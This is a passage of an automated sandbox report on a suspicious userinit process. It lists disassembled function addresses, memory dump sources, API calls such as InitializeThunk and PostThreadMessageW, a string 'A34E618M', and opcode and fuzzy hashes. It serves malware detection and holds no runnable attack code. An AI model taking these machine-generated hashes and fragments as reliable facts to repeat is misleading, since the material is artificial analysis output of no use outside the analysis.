                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e1ee8aa64a49252d3a5cf1582c2ffd94e399d963aa5d5d5796ff3641d45ae2dd
                                                      • Instruction ID: da8e7c649ff16bd1f5b470f82fc53bc69eb64b225085d4e25e527b40affaff43
                                                      • Opcode Fuzzy Hash: e1ee8aa64a49252d3a5cf1582c2ffd94e399d963aa5d5d5796ff3641d45ae2dd
                                                      • Instruction Fuzzy Hash: 2B900265212404034155B15C4459616404A87E0201B55C031E1014990DC62989916125
                                                      Function 03362BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0b87407b06c23aea52de3a2777273bf00e610581b1037ebe63a7a5532917ab2c
                                                      • Instruction ID: 855d3e0f358e6cf150bd45785b46909fc9c64f74c4a8746b2bda7073789727b1
                                                      • Opcode Fuzzy Hash: 0b87407b06c23aea52de3a2777273bf00e610581b1037ebe63a7a5532917ab2c
                                                      • Instruction Fuzzy Hash: 0490023561540C02D1A0B15C4459746004587D0301F55C021A0024A54D87598B5576A1
                                                      Function 03362BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 39bd9350dd78e7b2ab660f662eed85876600ec323bc8d37487ce9b1e92eee2a8
                                                      • Instruction ID: abaa80255c87094508c0af53263213ab66ef062ffbf2780288835a53083c6f8a
                                                      • Opcode Fuzzy Hash: 39bd9350dd78e7b2ab660f662eed85876600ec323bc8d37487ce9b1e92eee2a8
                                                      • Instruction Fuzzy Hash: 1390023521140C02D1D0B15C444964A004587D1301F95C025A0025A54DCB198B5977A1
                                                      Function 03362BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f2d03763a5b4564561e38c73f3880e0381bfc3141335a184227e7098e234c7ec
                                                      • Instruction ID: e22108af8686babd8a20ed67aad2e5667aa2c14b62ca3dd80ddeb4c71a6a0019
                                                      • Opcode Fuzzy Hash: f2d03763a5b4564561e38c73f3880e0381bfc3141335a184227e7098e234c7ec
                                                      • Instruction Fuzzy Hash: 1C90023521544C42D190B15C4449A46005587D0305F55C021A0064A94D97298E55B661
                                                      Function 03362AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 23aa6f0ae01d5af6d0616dd9ed9df34ebc1ab1e50ceb6c0c679426cc764049d5
                                                      • Instruction ID: 19fc3df69798d4d4243569a1076c843a6a7a71d968d7df839126e9409fa6dd7f
                                                      • Opcode Fuzzy Hash: 23aa6f0ae01d5af6d0616dd9ed9df34ebc1ab1e50ceb6c0c679426cc764049d5
                                                      • Instruction Fuzzy Hash: F6900229231404020195F55C064950B048597D6351395C025F1416990CC72589655321
                                                      Function 03362AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3bb70db22eae80e9586253e2941fbe2d14845cb3a553503471e372538e218e84
                                                      • Instruction ID: 1341958bd2ea48a6d1f00646a4a0c28cf58b72bca5920c76b75a30aebb7143ba
                                                      • Opcode Fuzzy Hash: 3bb70db22eae80e9586253e2941fbe2d14845cb3a553503471e372538e218e84
                                                      • Instruction Fuzzy Hash: 5B90043D331404030155F55C074D50700C7C7D5351355C031F1015D50CD735CD715131
                                                      Function 03362F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8f4439bb6e2bf922e784f685dd0ce966524ab3a4c0430e4df21a5e2160e522a1
                                                      • Instruction ID: 9341a1ced1b61bbff9d6da9db016f70e07537242e6af0d94fb9aefde7b2b1df4
                                                      • Opcode Fuzzy Hash: 8f4439bb6e2bf922e784f685dd0ce966524ab3a4c0430e4df21a5e2160e522a1
                                                      • Instruction Fuzzy Hash: D990026535140842D150B15C4459B060045C7E1301F55C025E1064954D871DCD526126
                                                      Function 03362FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3eb4646d90014330a23d511b9e2a51caf0dbdc7e58c4454bfcad7e48eb8b1f20
                                                      • Instruction ID: 2f5a034ce509b25da02b3fb696d31e800cb66d6be2e0d00c8f513f0eda3cf079
                                                      • Opcode Fuzzy Hash: 3eb4646d90014330a23d511b9e2a51caf0dbdc7e58c4454bfcad7e48eb8b1f20
                                                      • Instruction Fuzzy Hash: D6900225611404424190B16C88899064045ABE1211755C131A0998950D865D89655665
                                                      Function 03362FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0d9e99aa9cfd83238d432cff5c11a69ba2fa3a7425c42f9ca38a6aecf2203b4a
                                                      • Instruction ID: 95034372dcb93804969363588a5cf50340365f604fdb28cc99d8c886e5ad89e6
                                                      • Opcode Fuzzy Hash: 0d9e99aa9cfd83238d432cff5c11a69ba2fa3a7425c42f9ca38a6aecf2203b4a
                                                      • Instruction Fuzzy Hash: 52900225221C0442D250B56C4C59B07004587D0303F55C125A0154954CCA1989615521
                                                      Function 03362E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 534df2d1808c61fee41462cf16c6523feb6be0feab32bc482da5e36a993d0109
                                                      • Instruction ID: a5736f4c26d5fa2a767a8333db191a0efea9521e20d1d37f7af41bd52685e7bd
                                                      • Opcode Fuzzy Hash: 534df2d1808c61fee41462cf16c6523feb6be0feab32bc482da5e36a993d0109
                                                      • Instruction Fuzzy Hash: 5590022561140902D151B15C4449616004A87D0241F95C032A1024955ECB298A92A131
                                                      Function 03362EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c93444120a72884ecadd94743f2e6ec40e6d4a981f30e06475e11d1c37a913e4
                                                      • Instruction ID: 587fa467b0d1ac6b8ab64dba432c0c33d1dee59934a748ec2261389617eb983c
                                                      • Opcode Fuzzy Hash: c93444120a72884ecadd94743f2e6ec40e6d4a981f30e06475e11d1c37a913e4
                                                      • Instruction Fuzzy Hash: 3790026521180803D190B55C4849607004587D0302F55C021A2064955E8B2D8D516135
                                                      Function 03362D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c24a6bf520b08e2016001321d4f9a14c19914407a6d354a3c0a4f5428e44ec09
                                                      • Instruction ID: 1835a1b83ed8951f73aa7747186ca1ed6c122814a0886aa3188dcbcba81a2626
                                                      • Opcode Fuzzy Hash: c24a6bf520b08e2016001321d4f9a14c19914407a6d354a3c0a4f5428e44ec09
                                                      • Instruction Fuzzy Hash: AC90022531140403D190B15C545D6064045D7E1301F55D021E0414954CDA1989565222
                                                      Function 03362D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0b05595531387c250077fbcfe92d60ec4014da166b5acb90506c6f5a3b91853a
                                                      • Instruction ID: 1a22388aba2fb05f715295e72361fbcfa13a40ea42997cbfd6512fb5d7337cca
                                                      • Opcode Fuzzy Hash: 0b05595531387c250077fbcfe92d60ec4014da166b5acb90506c6f5a3b91853a
                                                      • Instruction Fuzzy Hash: 0C90022D22340402D1D0B15C544D60A004587D1202F95D425A0015958CCA1989695321
                                                      Function 03362DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 92eef9350a822868f25902abe84f849f0e749d458707c07181ee0c5477a67d17
                                                      • Instruction ID: d90f6fb752ef31edc6e433e8908c33b2c37298528a8306cf09d73f30ed4abbda
                                                      • Opcode Fuzzy Hash: 92eef9350a822868f25902abe84f849f0e749d458707c07181ee0c5477a67d17
                                                      • Instruction Fuzzy Hash: 6990023521140813D161B15C4549707004987D0241F95C422A0424958D975A8A52A121
                                                      Function 03362DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 087364c9bf08edb46bb9f03507ffaad29f26b1ce5b1cefef633ad0992f801c70
                                                      • Instruction ID: 094e51a31b2532bb2ebd22bde21a50133a04f67e3cce51b8f625d2d0a2da9a95
                                                      • Opcode Fuzzy Hash: 087364c9bf08edb46bb9f03507ffaad29f26b1ce5b1cefef633ad0992f801c70
                                                      • Instruction Fuzzy Hash: 95900225252445525595F15C4449507404697E0241795C022A1414D50C862A9956D621
                                                      Function 03362C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bf1440eb2e0b6522f05cc3f815c010da6231c3be386cf8ec0652d446a96e3956
                                                      • Instruction ID: d2675f96c636e4f035787bf906522419c32f40227ea3716e71d2611800cfc035
                                                      • Opcode Fuzzy Hash: bf1440eb2e0b6522f05cc3f815c010da6231c3be386cf8ec0652d446a96e3956
                                                      • Instruction Fuzzy Hash: 5190023521148C02D160B15C844974A004587D0301F59C421A4424A58D879989917121
                                                      Function 03362C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f8ddb2435b18999426a4e6225801c81cb2406f32af38d31ebfb0e769487c9a49
                                                      • Instruction ID: 04096f7dca468abc9c07fb9e3748f5bbd4dcb294439520493eb94f74d90b75a6
                                                      • Opcode Fuzzy Hash: f8ddb2435b18999426a4e6225801c81cb2406f32af38d31ebfb0e769487c9a49
                                                      • Instruction Fuzzy Hash: F590023521140C42D150B15C4449B46004587E0301F55C026A0124A54D8719C9517521
                                                      Function 03362CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e5022a1fc3b626be104e00c0462f524d44eefb425f1e88948353632009d9b177
                                                      • Instruction ID: 1a25f1415b76fa459dcebcac253eefa0ee902010b7439596c38e5df38f2f0c5f
                                                      • Opcode Fuzzy Hash: e5022a1fc3b626be104e00c0462f524d44eefb425f1e88948353632009d9b177
                                                      • Instruction Fuzzy Hash: 9D90023521140802D150B59C544D646004587E0301F55D021A5024955EC76989916131
                                                      Function 033635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9a2d51ad19b84cbfd624359e54174b2591d6c2cf20e576245f23702bd9ead8be
                                                      • Instruction ID: 342deceb97d5903ff1079cced5706cf2f8033c52e918b579e163d52a2c26b5da
                                                      • Opcode Fuzzy Hash: 9a2d51ad19b84cbfd624359e54174b2591d6c2cf20e576245f23702bd9ead8be
                                                      • Instruction Fuzzy Hash: 7690023561550802D150B15C4559706104587D0201F65C421A0424968D87998A5165A2
                                                      Function 033639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 519426022c42081e92f3e94e761b88bba387634c7a2222d98d63620e53c03365
                                                      • Instruction ID: f62859e4ab96476898ad0cbc86ff62f02e027cab8e26563094df2f57ec20f95c
                                                      • Opcode Fuzzy Hash: 519426022c42081e92f3e94e761b88bba387634c7a2222d98d63620e53c03365
                                                      • Instruction Fuzzy Hash: 9B90022525545502D1A0B15C44496164045A7E0201F55C031A0814994D865989556221
                                                      Function 00AB09E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 553 ab09e2-ab0a5a call acb250 call acbc60 call ab41d0 call aa1410 call ac18f0 564 ab0a7a-ab0a80 553->564 565 ab0a5c-ab0a6b PostThreadMessageW 553->565 565->564 566 ab0a6d-ab0a77 565->566 566->564
                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00AB0A67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: ec36e962493c55c13d92b3b05c6f1c4ef17b21ffc2821fd59ae206d085b6be5c
                                                      • Instruction ID: 074a4ee02e590c703d456b2714f841749747cff11267f507fe64384511ff2620
                                                      • Opcode Fuzzy Hash: ec36e962493c55c13d92b3b05c6f1c4ef17b21ffc2821fd59ae206d085b6be5c
                                                      • Instruction Fuzzy Hash: 2F11A0B2D4014C7EDB119BA48D82EEF7F7CAB55794F058058FA04A7242D6284E068BB1
                                                      Function 00AB09F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 567 ab09f0-ab0a02 568 ab0a0a-ab0a5a call acbc60 call ab41d0 call aa1410 call ac18f0 567->568 569 ab0a05 call acb250 567->569 578 ab0a7a-ab0a80 568->578 579 ab0a5c-ab0a6b PostThreadMessageW 568->579 569->568 579->578 580 ab0a6d-ab0a77 579->580 580->578
                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00AB0A67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: a0db7f70ae73b62c3b521aa543ac46997ae0d35de7db09515e08ff1ed1aa0e27
                                                      • Instruction ID: deaa28aa240784e3869df994cc6c84d47292f8018280a7a4f986cdc4995a4bcf
                                                      • Opcode Fuzzy Hash: a0db7f70ae73b62c3b521aa543ac46997ae0d35de7db09515e08ff1ed1aa0e27
                                                      • Instruction Fuzzy Hash: 100184B1D4025C7EDB10A7E48C82EEFBB7CEF55794F058068FA04A7142D6285E068BB1
                                                      Function 00ABF1C9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                      • Instruction ID: 16f5a80990f15357a4b334e8e57f76f722f8b149991b3f79eee9606c6b09f96e
                                                      • Opcode Fuzzy Hash: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                      • Instruction Fuzzy Hash: A43130B5A0060A9FDB00DFD8CC80DEEB7B9FF88304F148559E505EB215D775AE418BA0
                                                      Function 00ABF1D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
